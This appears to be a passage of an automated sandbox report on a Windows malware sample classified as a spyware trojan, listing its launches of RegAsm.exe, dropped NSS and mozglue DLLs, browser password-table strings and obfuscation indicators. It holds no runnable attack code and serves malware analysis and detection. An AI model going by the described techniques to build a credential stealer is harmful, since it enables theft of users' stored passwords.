Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C840820	3_2_6C840820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C87A820	3_2_6C87A820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C8C4840	3_2_6C8C4840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C8809A0	3_2_6C8809A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C8AA9A0	3_2_6C8AA9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C8B09B0	3_2_6C8B09B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C90C9E0	3_2_6C90C9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C8249F0	3_2_6C8249F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C846900	3_2_6C846900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C828960	3_2_6C828960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C86EA80	3_2_6C86EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C89EA00	3_2_6C89EA00

Found potential string decryption / allocating functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 00402290 appears 286 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6C9709D0 appears 99 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6C7194D0 appears 88 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6C70CBE8 appears 134 times

One or more processes crash

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7472 -s 932

PE / OLE file has an invalid certificate

Source: file.exe

Static PE information: invalid certificate

Sample file is different than original file name gathered from version info

Source: file.exe, 00000000.00000002.1701772300.0000000002EC3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameFriendly.exe4 vs file.exe
Source: file.exe, 00000000.00000002.1701210814.000000000103E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs file.exe
Source: file.exe, 00000000.00000000.1613149582.0000000000C5A000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameFriendly.exe4 vs file.exe
Source: file.exe	Binary or memory string: OriginalFilenameFriendly.exe4 vs file.exe

Tries to load missing DLLs

Source: C:\Users\user\Desktop\file.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windowscodecs.dll	Jump to behavior

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/30@1/2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_6C737030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

3_2_6C737030

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00410950 CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,CloseHandle,

3_2_00410950

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_004110A0 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,VariantClear,

3_2_004110A0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\76561199658817715[1].htm

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7472
Source: C:\Users\user\Desktop\file.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7480:120:WilError_03

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\dba7a0c9-4f22-4d27-8173-863aa989d419

Jump to behavior

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: file.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: RegAsm.exe, 00000003.00000002.1982253965.0000000019EB8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1986649501.000000006C97F000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 00000003.00000002.1977760885.0000000013F4C000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sqlm[1].dll.3.dr, nss3.dll.3.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: RegAsm.exe, 00000003.00000002.1982253965.0000000019EB8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1986649501.000000006C97F000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 00000003.00000002.1977760885.0000000013F4C000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sqlm[1].dll.3.dr, nss3.dll.3.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: RegAsm.exe, 00000003.00000002.1982253965.0000000019EB8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1986649501.000000006C97F000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 00000003.00000002.1977760885.0000000013F4C000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sqlm[1].dll.3.dr, nss3.dll.3.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: RegAsm.exe, 00000003.00000002.1982253965.0000000019EB8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1986649501.000000006C97F000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 00000003.00000002.1977760885.0000000013F4C000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sqlm[1].dll.3.dr, nss3.dll.3.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: RegAsm.exe, 00000003.00000002.1982253965.0000000019EB8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1977760885.0000000013F4C000.00000004.00000020.00020000.00000000.sdmp, sqlm[1].dll.3.dr	Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: RegAsm.exe, 00000003.00000002.1982253965.0000000019EB8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1977760885.0000000013F4C000.00000004.00000020.00020000.00000000.sdmp, sqlm[1].dll.3.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: RegAsm.exe, RegAsm.exe, 00000003.00000002.1982253965.0000000019EB8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1986649501.000000006C97F000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 00000003.00000002.1977760885.0000000013F4C000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sqlm[1].dll.3.dr, nss3.dll.3.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: RegAsm.exe, 00000003.00000002.1982253965.0000000019EB8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1986649501.000000006C97F000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 00000003.00000002.1977760885.0000000013F4C000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sqlm[1].dll.3.dr, nss3.dll.3.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: RegAsm.exe, 00000003.00000002.1982253965.0000000019EB8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1977760885.0000000013F4C000.00000004.00000020.00020000.00000000.sdmp, sqlm[1].dll.3.dr	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: GHDHDBAECGCAFHJJDAKF.3.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: RegAsm.exe, 00000003.00000002.1982253965.0000000019EB8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1977760885.0000000013F4C000.00000004.00000020.00020000.00000000.sdmp, sqlm[1].dll.3.dr	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: RegAsm.exe, 00000003.00000002.1982253965.0000000019EB8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1977760885.0000000013F4C000.00000004.00000020.00020000.00000000.sdmp, sqlm[1].dll.3.dr	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: file.exe

Virustotal: Detection: 29%

Source: RegAsm.exe	String found in binary or memory: t-keys-7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us https://support.microsoft.com/en-us/topic/install-the-english-language-pack-for-32-bit-office-94ba2e0b-638e-4a92-8857-2cb5ac1d8e17?ui=en-us&rs=en-us&ad=us https://support.
Source: RegAsm.exe	String found in binary or memory: 48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us https://support.microsoft.com/en-us/topic/install-the-english-language-pack-for-32-bit-office-94ba2e0b-638e-4a92-8857-2cb5ac1d8e17?ui=en-us&rs=en-us&ad=us https://support.office.co

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7472 -s 932
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: mozglue.pdbP source: RegAsm.exe, 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.3.dr, mozglue.dll.3.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.3.dr, freebl3.dll.3.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.3.dr, freebl3.dll.3.dr
Source:	Binary string: nss3.pdb@ source: RegAsm.exe, 00000003.00000002.1986649501.000000006C97F000.00000002.00000001.01000000.00000009.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr
Source:	Binary string: mscorlib.pdb source: WERD260.tmp.dmp.6.dr
Source:	Binary string: System.ni.pdbRSDS source: WERD260.tmp.dmp.6.dr
Source:	Binary string: mscorlib.ni.pdb source: WERD260.tmp.dmp.6.dr
Source:	Binary string: Friendly.pdb source: WERD260.tmp.dmp.6.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.3.dr, softokn3.dll.3.dr
Source:	Binary string: System.pdb4 source: WERD260.tmp.dmp.6.dr
Source:	Binary string: System.Core.pdb source: WERD260.tmp.dmp.6.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.3.dr, vcruntime140[1].dll.3.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.3.dr, msvcp140.dll.3.dr
Source:	Binary string: nss3.pdb source: RegAsm.exe, 00000003.00000002.1986649501.000000006C97F000.00000002.00000001.01000000.00000009.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WERD260.tmp.dmp.6.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000003.00000002.1982253965.0000000019EB8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1977760885.0000000013F4C000.00000004.00000020.00020000.00000000.sdmp, sqlm[1].dll.3.dr
Source:	Binary string: mozglue.pdb source: RegAsm.exe, 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.3.dr, mozglue.dll.3.dr
Source:	Binary string: c:\nconvxoz3\obj\Release\Friendly.pdb source: file.exe
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.3.dr, softokn3.dll.3.dr
Source:	Binary string: System.ni.pdb source: WERD260.tmp.dmp.6.dr
Source:	Binary string: System.pdb source: WERD260.tmp.dmp.6.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WERD260.tmp.dmp.6.dr
Source:	Binary string: System.Core.ni.pdb source: WERD260.tmp.dmp.6.dr

Contains functionality to dynamically determine API calls

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

3_2_004181D0

PE file contains sections with non-standard names

Source: msvcp140.dll.3.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.3.dr	Static PE information: section name: .didat
Source: nss3.dll.3.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.3.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.3.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.3.dr	Static PE information: section name: .00cfg
Source: sqlm[1].dll.3.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.3.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.3.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.3.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.3.dr	Static PE information: section name: .00cfg

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041A115 push ecx; ret		3_2_0041A128
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C70B536 push ecx; ret		3_2_6C70B549

Source: file.exe

Static PE information: section name: .text entropy: 7.97607995169573

Drops PE files

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqlm[1].dll	Jump to dropped file

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

3_2_004181D0

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
